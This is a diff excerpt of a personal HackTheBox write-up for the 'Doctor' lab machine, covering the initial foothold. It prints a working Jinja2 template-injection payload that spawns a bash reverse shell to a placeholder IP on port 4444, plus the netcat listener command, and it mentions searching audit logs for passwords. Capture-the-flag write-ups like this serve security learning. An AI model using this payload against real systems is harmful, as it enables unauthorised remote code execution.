brownPineapple/hackthebox/doctor.md

 ### Initial Foothold

-+ Checking for reverse shell payloads on PayloadAllTheThings SSTI -
++ Checking for reverse shell payloads on PayloadAllTheThings SSTI - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
 + The one that worked was - ```{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c 'bash -i >& /dev/tcp/<ip>/4444 0>&1'").read()}}{%endif%}{%endfor%}```
-+ Starting netcat listener - ```nc -lvnp 4444``` and getting reverse shell as web@doctor
++ Starting netcat listener, refreshing the /archive direcroty - ```nc -lvnp 4444``` and getting reverse shell as web@doctor
 ![image](https://github.com/brownPineapple/hackthebox/assets/30342446/2e42813a-dcba-415b-bdbf-b15d7951a808)
 + ```/home``` directory has another user shaun with user.txt file
 + We are part of the admin group, we can check audit logs for passwords